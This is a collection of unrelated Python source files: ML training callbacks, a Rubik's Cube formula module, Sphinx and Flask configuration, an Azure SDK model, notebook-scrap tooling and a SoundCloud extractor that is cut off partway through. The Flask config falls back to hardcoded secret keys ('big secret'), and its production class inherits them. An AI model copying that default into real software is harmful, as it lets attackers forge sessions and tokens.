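# Python versions the branches above target (3.6 or 3.7), since the private
# typing internals used here were removed in later releases.
if __name__ == "__main__":
    checker = TypeChecker()
    print(checker.is_generic(typing.List[int]))   # True: a parametrized generic
    print(checker.is_base_generic(typing.List))   # True: an unsubscripted generic
    print(checker.is_class(dict))                 # False: dict counts as a primitive
    print(checker.is_primitive(dict))             # True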
|
import torchbearer
from torchbearer.callbacks import Callback
import torch
class WeightDecay(Callback):
"""Create a WeightDecay callback which uses the given norm on the given parameters and with the given decay rate.
If params is None (default) then the parameters will be retrieved from the model.
Example: ::
>>> from torchbearer import Trial
>>> from torchbearer.callbacks import WeightDecay
# Example Trial which runs a trial with weight decay on the model
>>> decay = WeightDecay()
>>> trial = Trial(None, callbacks=[decay], metrics=['loss'], verbose=2).for_steps(10).run(1)
Args:
rate (float): The decay rate or lambda
p (int): The norm level
        params (Iterable[Tensor] or Tensor, optional): an iterable of Tensors or a
            single Tensor that the decay penalty is computed over, otherwise the model parameters are retrieved from state
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `parameters` method
- :attr:`torchbearer.state.LOSS`: Loss should be a tensor that can be incremented
"""
def __init__(self, rate=5e-4, p=2, params=None):
super(WeightDecay, self).__init__()
self.p = p
self.params = params
self.rate = rate
def on_start(self, state):
"""Retrieve params from state['model'] if required.
Args:
state (dict): The :class:`.Trial` state
"""
if self.params is None:
self.params = state[torchbearer.MODEL].parameters()
def on_criterion(self, state):
"""Calculate the decay term and add to state['loss'].
Args:
state (dict): The :class:`.Trial` state
"""
for param in self.params:
state[torchbearer.LOSS] += self.rate * torch.norm(param, self.p)
class L1WeightDecay(WeightDecay):
"""WeightDecay callback which uses an L1 norm with the given rate and parameters. If params is None (default) then
the parameters will be retrieved from the model.
Example: ::
>>> from torchbearer import Trial
>>> from torchbearer.callbacks import L1WeightDecay
# Example Trial which runs a trial with weight decay on the model using an L1 norm
>>> decay = L1WeightDecay()
>>> trial = Trial(None, callbacks=[decay], metrics=['loss'], verbose=2).for_steps(10).run(1)
Args:
rate (float): The decay rate or lambda
        params (Iterable[Tensor] or Tensor, optional): an iterable of Tensors or a
            single Tensor that the decay penalty is computed over, otherwise the model parameters are retrieved from state
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `parameters` method
- :attr:`torchbearer.state.LOSS`: Loss should be a tensor that can be incremented
"""
def __init__(self, rate=5e-4, params=None):
super(L1WeightDecay, self).__init__(rate=rate, p=1, params=params)
class L2WeightDecay(WeightDecay):
"""WeightDecay callback which uses an L2 norm with the given rate and parameters. If params is None (default) then
the parameters will be retrieved from the model.
Example: ::
>>> from torchbearer import Trial
>>> from torchbearer.callbacks import L2WeightDecay
# Example Trial which runs a trial with weight decay on the model using an L2 norm
>>> decay = L2WeightDecay()
>>> trial = Trial(None, callbacks=[decay], metrics=['loss'], verbose=2).for_steps(10).run(1)
Args:
rate (float): The decay rate or lambda
        params (Iterable[Tensor] or Tensor, optional): an iterable of Tensors or a
            single Tensor that the decay penalty is computed over, otherwise the model parameters are retrieved from state
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `parameters` method
- :attr:`torchbearer.state.LOSS`: Loss should be a tensor that can be incremented
"""
def __init__(self, rate=5e-4, params=None):
super(L2WeightDecay, self).__init__(rate=rate, p=2, params=params)
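# A quick standalone sketch (not part of torchbearer) of what the callbacks above
# add to the loss: with rate=1.0 and p=2 the penalty is exactly the L2 norm of each
# parameter tensor. The tiny Linear model below is purely illustrative.
def _weight_decay_sketch():
    model = torch.nn.Linear(2, 1, bias=False)
    state = {torchbearer.MODEL: model, torchbearer.LOSS: torch.tensor(0.0)}
    decay = WeightDecay(rate=1.0, p=2)
    decay.on_start(state)       # pulls model.parameters() into the callback
    decay.on_criterion(state)   # loss is incremented by torch.norm(model.weight, 2)
    return state[torchbearer.LOSS]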
|
"""
This module implements the Rubik's Cube formulae.
You can deal with Rubik's Cube formulae easily with Move and Formula.
Usage:
>>> a = Formula("R U R' U'")
>>> a
R U R' U'
>>> a.reverse()
>>> a
U R U' R'
>>> a.mirror()
>>> a
U' L' U L
>>> a *= 3
>>> a
U' L' U L U' L' U L U' L' U L
"""
from .move import GenericCubicMove, Move
from .formula import BaseFormula
class GenericCubicFormula(BaseFormula):
_move = GenericCubicMove
class Formula(GenericCubicFormula):
_move = Move
__all__ = ["GenericCubicMove", "Move", "GenericCubicFormula", "Formula"]
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
from pkg_resources import get_distribution
# -- Project information -----------------------------------------------------
project = 'muse-psfr'
copyright = '2019, Simon Conseil, Thierry Fusco'
author = 'Simon Conseil, Thierry Fusco'
release = get_distribution('muse_psfr').version
version = '.'.join(release.split('.')[:2])
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
'sphinxcontrib.programoutput',
'matplotlib.sphinxext.plot_directive',
]
plot_include_source = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all documents
default_role = 'obj'
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
# 'numpy': ('https://docs.scipy.org/doc/numpy/', None),
# 'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None),
# 'matplotlib': ('https://matplotlib.org/', None),
'astropy': ('http://docs.astropy.org/en/stable/', None),
}
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FallbackRouteProperties(Model):
"""The properties of the fallback route. IoT Hub uses these properties when it
routes messages to the fallback endpoint.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
    :param name: The name of the route. The name can only include alphanumeric
    characters, periods, underscores and hyphens; it has a maximum length of 64
    characters and must be unique.
:type name: str
    :ivar source: Required. The source to which the routing rule is to be
    applied. For example, DeviceMessages. Default value: "DeviceMessages".
:vartype source: str
:param condition: The condition which is evaluated in order to apply the
fallback route. If the condition is not provided it will evaluate to true
by default. For grammar, See:
https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-query-language
:type condition: str
    :param endpoint_names: Required. The list of endpoints to which the
    messages that satisfy the condition are routed. Currently only 1
    endpoint is allowed.
:type endpoint_names: list[str]
:param is_enabled: Required. Used to specify whether the fallback route is
enabled.
:type is_enabled: bool
"""
_validation = {
'source': {'required': True, 'constant': True},
'endpoint_names': {'required': True, 'max_items': 1, 'min_items': 1},
'is_enabled': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'source': {'key': 'source', 'type': 'str'},
'condition': {'key': 'condition', 'type': 'str'},
'endpoint_names': {'key': 'endpointNames', 'type': '[str]'},
'is_enabled': {'key': 'isEnabled', 'type': 'bool'},
}
source = "DeviceMessages"
def __init__(self, *, endpoint_names, is_enabled: bool, name: str=None, condition: str=None, **kwargs) -> None:
super(FallbackRouteProperties, self).__init__(**kwargs)
self.name = name
self.condition = condition
self.endpoint_names = endpoint_names
self.is_enabled = is_enabled
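# A minimal construction sketch (not part of the generated SDK file): a fallback
# route that sends all device messages to the built-in 'events' endpoint. The
# endpoint name, route name and condition are illustrative values only.
def _example_fallback_route():
    return FallbackRouteProperties(
        endpoint_names=['events'],
        is_enabled=True,
        name='$fallback',
        condition='true',
    )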
|
# -*- coding: utf-8 -*-
"""
models.py
Provides the various model wrapper objects for scrapbook
"""
from __future__ import unicode_literals
import os
import copy
import nbformat
import collections
import pandas as pd
from six import string_types
from collections import OrderedDict
from IPython.display import display as ip_display, Markdown
# We lean on papermill's readers to connect to remote stores
from papermill.iorw import papermill_io
from .scraps import Scrap, Scraps, payload_to_scrap, scrap_to_payload
from .schemas import GLUE_PAYLOAD_PREFIX, RECORD_PAYLOAD_PREFIX
from .encoders import registry as encoder_registry
from .exceptions import ScrapbookException
from .utils import kernel_required, deprecated
try:
from urllib.parse import urlparse # Py3
except ImportError:
from urlparse import urlparse # Py2
def merge_dicts(dicts):
iterdicts = iter(dicts)
outcome = next(iterdicts).copy()
for d in iterdicts:
outcome.update(d)
return outcome
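# For example, merge_dicts([{"a": 1}, {"a": 2, "b": 3}]) returns {"a": 2, "b": 3};
# later dictionaries win on key collisions.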
class Notebook(object):
"""
Representation of a notebook. This model is quasi-compatible with the
    nbformat NotebookNode object in that it supports access to the v4
required fields from nbformat's json schema. For complete access to
normal nbformat operations, use the `node` attribute of this model.
Parameters
----------
node_or_path : `nbformat.NotebookNode`, str
a notebook object, or a path to a notebook object
"""
def __init__(self, node_or_path):
if isinstance(node_or_path, string_types):
path = urlparse(node_or_path).path
if not os.path.splitext(path)[-1].endswith('ipynb'):
raise Warning(
"Requires an '.ipynb' file extension. Provided path: '{}'".format(
node_or_path
)
)
self.path = node_or_path
self.node = nbformat.reads(papermill_io.read(node_or_path), as_version=4)
else:
self.path = ""
self.node = node_or_path
# Memoized traits
self._scraps = None
self._outputs = None
def copy(self):
cp = Notebook(self.node.copy())
cp.path = self.path
return cp
# nbformat mirroring properties
@property
def metadata(self):
return self.node.metadata
@property
def nbformat_minor(self):
return self.node.nbformat_minor
@property
def nbformat(self):
return self.node.nbformat
@property
def cells(self):
return self.node.cells
@property
def filename(self):
"""str: filename found a the specified path"""
return os.path.basename(self.path)
@property
def directory(self):
"""str: directory name found for a notebook (nb)"""
return os.path.dirname(self.path)
@property
def parameters(self):
"""dict: parameters stored in the notebook metadata"""
return self.metadata.get("papermill", {}).get("parameters", {})
def _extract_papermill_output_data(self, sig, payload):
if sig.startswith(RECORD_PAYLOAD_PREFIX):
# Fetch '+json' and strip the leading '+'
encoder = sig.split(RECORD_PAYLOAD_PREFIX, 1)[1][1:]
# First key is the only named payload
for name, data in payload.items():
return encoder_registry.decode(Scrap(name, data, encoder))
def _extract_output_data_scraps(self, output):
output_scraps = Scraps()
for sig, payload in output.get("data", {}).items():
# Backwards compatibility for papermill
scrap = self._extract_papermill_output_data(sig, payload)
if scrap is None and sig.startswith(GLUE_PAYLOAD_PREFIX):
scrap = encoder_registry.decode(payload_to_scrap(payload))
if scrap:
output_scraps[scrap.name] = scrap
return output_scraps
def _extract_output_displays(self, output):
output_displays = OrderedDict()
# Backwards compatibility for papermill
metadata = output.get("metadata", {})
if "papermill" in metadata:
output_name = output.metadata["papermill"].get("name")
if output_name:
output_displays[output_name] = output
# Only grab outputs that are displays
elif metadata.get("scrapbook", {}).get("display"):
output_name = output.metadata["scrapbook"].get("name")
if output_name:
output_displays[output_name] = output
return output_displays
def _fetch_scraps(self):
"""Returns a dictionary of the data recorded in a notebook."""
scraps = Scraps()
for cell in self.cells:
for output in cell.get("outputs", []):
output_data_scraps = self._extract_output_data_scraps(output)
output_displays = self._extract_output_displays(output)
# Combine displays with data while trying to preserve ordering
output_scraps = Scraps(
[
# Hydrate with output_displays
(
scrap.name,
Scrap(
scrap.name,
scrap.data,
scrap.encoder,
output_displays.get(scrap.name),
),
)
for scrap in output_data_scraps.values()
]
)
for name, display in output_displays.items():
if name not in output_scraps:
output_scraps[name] = Scrap(name, None, "display", display)
scraps.update(output_scraps)
return scraps
@property
def scraps(self):
"""dict: a dictionary of data found in the notebook"""
if self._scraps is None:
self._scraps = self._fetch_scraps()
return self._scraps
@property
def cell_timing(self):
"""list: a list of cell execution timings in cell order"""
return [
# TODO: Other timing conventions?
cell.metadata.get("papermill", {}).get("duration", 0.0)
if cell.get("execution_count")
else None
for cell in self.cells
]
@property
def execution_counts(self):
"""list: a list of cell execution counts in cell order"""
return [cell.get("execution_count") for cell in self.cells]
@property
@deprecated('0.4.0', '`metrics`')
def papermill_metrics(self):
return self.metrics
@property
def metrics(self):
"""pandas dataframe: dataframe of cell execution counts and times"""
df = pd.DataFrame(columns=["filename", "cell", "value", "type"])
for i, cell in enumerate(self.cells):
execution_count = cell.get("execution_count")
if not execution_count:
continue
name = "Out [{}]".format(str(execution_count))
value = cell.metadata.get("papermill", {}).get("duration", 0.0)
df.loc[i] = self.filename, name, value, "time (s)"
return df
@property
def parameter_dataframe(self):
"""pandas dataframe: dataframe of notebook parameters"""
# Meant for backwards compatibility to papermill's dataframe method
return pd.DataFrame(
[
[name, self.parameters[name], "parameter", self.filename]
for name in sorted(self.parameters.keys())
],
columns=["name", "value", "type", "filename"],
)
@property
def scrap_dataframe(self):
"""pandas dataframe: dataframe of cell scraps"""
df = self.scraps.dataframe
df["filename"] = self.filename
return df
@property
@deprecated('1.0.0')
def papermill_record_dataframe(self):
"""pandas dataframe: dataframe of cell scraps"""
# Meant for backwards compatibility to papermill's dataframe method
return pd.DataFrame(
[
[name, self.scraps[name].data, "record", self.filename]
for name in sorted(self.scraps.keys())
if self.scraps[name].data is not None
],
columns=["name", "value", "type", "filename"],
)
@property
@deprecated('1.0.0')
def papermill_dataframe(self):
"""pandas dataframe: dataframe of notebook parameters and cell scraps"""
# Meant for backwards compatibility to papermill's dataframe method
return self.parameter_dataframe.append(
self.papermill_record_dataframe, ignore_index=True
)
def _strip_scrapbook_metadata(self, metadata):
copied = copy.copy(metadata)
# Strip old metadata name
copied.pop("papermill", None)
copied.pop("scrapbook", None)
return copied
@kernel_required
def reglue(self, name, new_name=None, raise_on_missing=True, unattached=False):
"""
Display output from a named source of the notebook.
Parameters
----------
name : str
name of scrap object
new_name : str
replacement name for scrap
        raise_on_missing : bool
            indicator for whether to raise an error or just print a message when the scrap is missing
unattached : bool
indicator for rendering without making the display recallable as scrapbook data
"""
# Avoid circular imports
from .api import _prepare_ipy_data_format, _prepare_ipy_display_format
if name not in self.scraps:
if raise_on_missing:
raise ScrapbookException(
"Scrap '{}' is not available in this notebook.".format(name)
)
else:
ip_display(
"No scrap found with name '{}' in this notebook".format(name)
)
else:
scrap = self.scraps[name]
if new_name:
scrap = scrap._replace(name=new_name)
if scrap.data is not None:
data, metadata = _prepare_ipy_data_format(
scrap.name, scrap_to_payload(scrap), scrap.encoder
)
# Skip saving data for later regluing and remove 'scrapbook'
# from keys, when unattached
if unattached:
metadata = self._strip_scrapbook_metadata(metadata)
ip_display(data, metadata=metadata, raw=True)
if scrap.display is not None:
scrap_data = scrap.display.get("data", {})
scrap_metadata = self._strip_scrapbook_metadata(
scrap.display.get("metadata", {})
)
data, metadata = _prepare_ipy_display_format(
scrap.name, scrap_data, scrap_metadata
)
if unattached:
# Remove 'scrapbook' from keys if we want it unassociated
metadata = self._strip_scrapbook_metadata(metadata)
ip_display(data, metadata=metadata, raw=True)
class Scrapbook(collections.MutableMapping):
"""
A collection of notebooks represented as a dictionary of notebooks
"""
def __init__(self):
self._notebooks = OrderedDict()
def __setitem__(self, key, value):
# If notebook is a path str then load the notebook.
if isinstance(value, string_types):
value = Notebook(value)
self._notebooks.__setitem__(key, value)
def __getitem__(self, key):
return self._notebooks.__getitem__(key)
def __delitem__(self, key):
return self._notebooks.__delitem__(key)
def __iter__(self):
return self._notebooks.__iter__()
def __len__(self):
return self._notebooks.__len__()
@property
@deprecated('1.0.0')
def papermill_dataframe(self):
"""list: a list of data names from a collection of notebooks"""
# Backwards compatible dataframe interface
df_list = []
for key in self._notebooks:
nb = self._notebooks[key]
df = nb.papermill_dataframe
df["key"] = key
df_list.append(df)
return pd.concat(df_list).reset_index(drop=True)
@property
@deprecated('0.4.0', 'metrics')
def papermill_metrics(self):
return self.metrics
@property
def metrics(self):
"""list: a list of metrics from a collection of notebooks"""
df_list = []
for key in self._notebooks:
nb = self._notebooks[key]
df = nb.metrics
df["key"] = key
df_list.append(df)
return pd.concat(df_list).reset_index(drop=True)
@property
def notebooks(self):
"""list: a sorted list of associated notebooks."""
return self.values()
@property
def notebook_scraps(self):
"""dict: a dictionary of the notebook scraps by key."""
return OrderedDict([(key, nb.scraps) for key, nb in self._notebooks.items()])
@property
def scraps(self):
"""dict: a dictionary of the merged notebook scraps."""
return Scraps(merge_dicts(nb.scraps for nb in self.notebooks))
def scraps_report(
self, scrap_names=None, notebook_names=None, include_data=False, headers=True
):
"""
        Display scraps as markdown structured outputs.
Parameters
----------
scrap_names : str or iterable[str] (optional)
the scraps to display as reported outputs
notebook_names : str or iterable[str] (optional)
notebook names to use in filtering on scraps to report
include_data : bool (default: False)
indicator that data-only scraps should be reported
        headers : bool (default: True)
            indicator for whether the scraps should render with a header
"""
def trim_repr(data):
# Generate a small data representation for display purposes
            if not isinstance(data, string_types):
                data_str = repr(data)
            else:
                data_str = data
if len(data_str) > 102:
data_str = data_str[:100] + "..."
return data_str
if isinstance(scrap_names, string_types):
scrap_names = [scrap_names]
scrap_names = set(scrap_names or [])
if notebook_names is None:
notebook_names = self._notebooks.keys()
elif isinstance(notebook_names, string_types):
notebook_names = [notebook_names]
for i, nb_name in enumerate(notebook_names):
notebook = self[nb_name]
if headers:
if i > 0:
ip_display(Markdown("<hr>")) # tag between outputs
ip_display(Markdown("### {}".format(nb_name)))
for name in scrap_names or notebook.scraps.display_scraps.keys():
if headers:
ip_display(Markdown("#### {}".format(name)))
notebook.reglue(name, raise_on_missing=False, unattached=True)
if include_data:
                for name, scrap in notebook.scraps.data_scraps.items():
                    # only report requested scraps when a name filter was given
                    # (iterating the name set itself would not yield (name, scrap) pairs)
                    if scrap_names and name not in scrap_names:
                        continue
if scrap.display is None and scrap.data is not None:
if headers:
ip_display(Markdown("#### {}".format(name)))
ip_display(trim_repr(scrap.data))
else:
ip_display(
"{}: {}".format(scrap.name, trim_repr(scrap.data))
)
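# A minimal usage sketch (the paths and keys below are illustrative, not files
# that ship with scrapbook): collect two executed notebooks and print a report.
def _example_scrap_report():
    book = Scrapbook()
    book["train"] = "output/train.ipynb"       # string paths are wrapped in Notebook
    book["evaluate"] = "output/evaluate.ipynb"
    print(list(book.scraps.keys()))            # merged scrap names across notebooks
    book.scraps_report(include_data=True)      # markdown report of displays and data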
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
imagesdir = os.path.join(os.path.dirname(basedir),'uploads')
"""Constants used throughout the application.
All hard coded settings/data that are not actual/official configuration
options for Flask and their extensions goes here.
"""
class Config:
"""Default Flask configuration inherited by all environments. Use this for
development environments.
"""
SECRET_KEY = os.environ.get("SECRET_KEY") or "big secret"
JWT_SECRET_KEY = os.environ.get("SECRET_KEY") or "very big secret"
JWT_BLACKLIST_ENABLED = True
JWT_BLACKLIST_TOKEN_CHECKS = ["access", "refresh"]
LABELS_ALLOWED = ["bbox","polygon"]
TEAMS_ALLOWED = ["labels","images","image labelling","models"]
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
"""Development Congigurations"""
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get(
"DEV_DATABASE_URL"
)
SQLALCHEMY_TRACK_MODIFICATIONS = False
# needs to be removed in further versions
ML_FILES_DIR = os.path.join(os.path.dirname(basedir),'ml_files')
UPLOAD_FOLDER = imagesdir
class TestingConfig(Config):
"""
Testing config applies for both local testing and travis configurations
"""
TESTING = True
WTF_CSRF_ENABLED = False
TEST_DATABASE = os.environ.get(
"TEST_DATABASE_URL"
)
if os.getenv("FLASK_CONFIG")=="travis":
pass
else:
from sqlalchemy_utils.functions import database_exists, create_database
if not database_exists(TEST_DATABASE):
create_database(TEST_DATABASE)
SQLALCHEMY_DATABASE_URI = TEST_DATABASE
SQLALCHEMY_TRACK_MODIFICATIONS = False
# needs to be removed in further versions
UPLOAD_FOLDER = imagesdir
class ProductionConfig(Config):
"""Production Congigurations"""
SQLALCHEMY_DATABASE_URI = os.environ.get(
"DATABASE_URL"
)
@classmethod
def init_app(cls, app):
Config.init_app(app)
class DockerConfig(Config):
"""Docker config"""
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# log to stderr
import logging
from logging import StreamHandler
file_handler = StreamHandler()
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
class TravisConfig(Config):
"""
Configs for travis
"""
TESTING = True
WTF_CSRF_ENABLED = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
# needs to be removed in further versions
UPLOAD_FOLDER = imagesdir
ML_FILES_DIR = os.path.join(os.path.dirname(basedir),'ml_files')
LABELS_ALLOWED = ["bbox","polygon"]
TEAMS_ALLOWED = ["labels","images","image labelling","models"]
config = {
"development": DevelopmentConfig,
"testing": TestingConfig,
"production": ProductionConfig,
"docker": DockerConfig,
"default": DevelopmentConfig,
"travis": TravisConfig
}
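# A minimal sketch of how the mapping above is usually consumed by an application
# factory. The factory name and the FLASK_CONFIG lookup are assumptions about the
# surrounding project, not part of this config module.
def _example_create_app():
    from flask import Flask
    config_name = os.getenv("FLASK_CONFIG", "default")
    app = Flask(__name__)
    app.config.from_object(config[config_name])
    config[config_name].init_app(app)
    return app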
|
# coding: utf-8
from __future__ import unicode_literals
import itertools
import re
from .common import (
InfoExtractor,
SearchInfoExtractor
)
from ..compat import (
compat_HTTPError,
compat_kwargs,
compat_str,
compat_urlparse,
)
from ..utils import (
error_to_compat_str,
ExtractorError,
float_or_none,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
mimetype2ext,
str_or_none,
try_get,
unescapeHTML,
unified_timestamp,
update_url_query,
url_or_none,
urlhandle_detect_ext,
)
try:
from ..extractor_artifacts.soundcloud import prerelease_client_id
except ImportError:
prerelease_client_id = None
class SoundcloudEmbedIE(InfoExtractor):
_VALID_URL = r'https?://(?:w|player|p)\.soundcloud\.com/player/?.*?\burl=(?P<id>.+)'
_TEST = {
# from https://www.soundi.fi/uutiset/ennakkokuuntelussa-timo-kaukolammen-station-to-station-to-station-julkaisua-juhlitaan-tanaan-g-livelabissa/
'url': 'https://w.soundcloud.com/player/?visual=true&url=https%3A%2F%2Fapi.soundcloud.com%2Fplaylists%2F922213810&show_artwork=true&maxwidth=640&maxheight=960&dnt=1&secret_token=s-ziYey',
'only_matching': True,
}
@staticmethod
def _extract_urls(webpage, **kwargs):
return [unescapeHTML(m.group('url')) for m in re.finditer(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?://)?(?:w\.)?soundcloud\.com/player.+?)\1',
webpage)]
def _real_extract(self, url):
query = compat_urlparse.parse_qs(
compat_urlparse.urlparse(url).query)
api_url = query['url'][0]
secret_token = query.get('secret_token')
if secret_token:
api_url = update_url_query(api_url, {'secret_token': secret_token[0]})
return self.url_result(api_url)
class SoundcloudIE(InfoExtractor):
"""Information extractor for soundcloud.com
To access the media, the uid of the song and a stream token
must be extracted from the page source and the script must make
a request to media.soundcloud.com/crossdomain.xml. Then
the media can be grabbed by requesting from an url composed
of the stream token and uid
"""
_VALID_URL = r'''(?x)^(?:https?://)?
(?:(?:(?:www\.|m\.)?soundcloud\.com/
(?!stations/track)
(?P<uploader>[\w\d-]+)/
(?!(?:tracks|albums|sets(?:/.+?)?|reposts|likes|spotlight)/?(?:$|[?#]))
(?P<title>[\w\d-]+)/?
(?P<token>[^?]+?)?(?:[?].*)?$)
|(?:api(?:-v2)?\.soundcloud\.com/tracks/(?P<track_id>\d+)
(?:/?\?secret_token=(?P<secret_token>[^&]+))?)
)
'''
IE_NAME = 'soundcloud'
_TESTS = [
{
'url': 'http://soundcloud.com/ethmusic/lostin-powers-she-so-heavy',
'md5': 'ebef0a451b909710ed1d7787dddbf0d7',
'info_dict': {
'id': '62986583',
'ext': 'mp3',
'title': 'Lostin Powers - She so Heavy (SneakPreview) Adrian Ackers Blueprint 1',
'description': 'No Downloads untill we record the finished version this weekend, i was too pumped n i had to post it , earl is prolly gonna b hella p.o\'d',
'uploader': 'E.T. ExTerrestrial Music',
'uploader_id': '1571244',
'timestamp': 1349920598,
'upload_date': '20121011',
'duration': 143.216,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
}
},
# geo-restricted
{
'url': 'https://soundcloud.com/the-concept-band/goldrushed-mastered?in=the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '47127627',
'ext': 'mp3',
'title': 'Goldrushed',
'description': 'From Stockholm Sweden\r\nPovel / Magnus / Filip / David\r\nwww.theroyalconcept.com',
'uploader': 'The Royal Concept',
'uploader_id': '9615865',
'timestamp': 1337635207,
'upload_date': '20120521',
'duration': 227.155,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link
{
'url': 'https://soundcloud.com/jaimemf/haruhi-dl-test-video-a-y-baw/s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link (alt format)
{
'url': 'https://api.soundcloud.com/tracks/123998367?secret_token=s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# downloadable song
{
'url': 'https://soundcloud.com/oddsamples/bus-brakes',
'md5': '7624f2351f8a3b2e7cd51522496e7631',
'info_dict': {
'id': '128590877',
'ext': 'mp3',
'title': 'Bus Brakes',
'description': 'md5:0053ca6396e8d2fd7b7e1595ef12ab66',
'uploader': 'oddsamples',
'uploader_id': '73680509',
'timestamp': 1389232924,
'upload_date': '20140109',
'duration': 17.346,
'license': 'cc-by-sa',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link, downloadable format
{
'url': 'https://soundcloud.com/oriuplift/uponly-238-no-talking-wav/s-AyZUd',
'md5': '64a60b16e617d41d0bef032b7f55441e',
'info_dict': {
'id': '340344461',
'ext': 'wav',
'title': 'Uplifting Only 238 [No Talking] (incl. Alex Feed Guestmix) (Aug 31, 2017) [wav]',
'description': 'md5:fa20ee0fca76a3d6df8c7e57f3715366',
'uploader': 'Ori Uplift Music',
'uploader_id': '12563093',
'timestamp': 1504206263,
'upload_date': '20170831',
'duration': 7449.096,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# no album art, use avatar pic for thumbnail
{
'url': 'https://soundcloud.com/garyvee/sideways-prod-mad-real',
'md5': '59c7872bc44e5d99b7211891664760c2',
'info_dict': {
'id': '309699954',
'ext': 'mp3',
'title': 'Sideways (Prod. Mad Real)',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'uploader': 'garyvee',
'uploader_id': '2366352',
'timestamp': 1488152409,
'upload_date': '20170226',
'duration': 207.012,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://soundcloud.com/giovannisarani/mezzo-valzer',
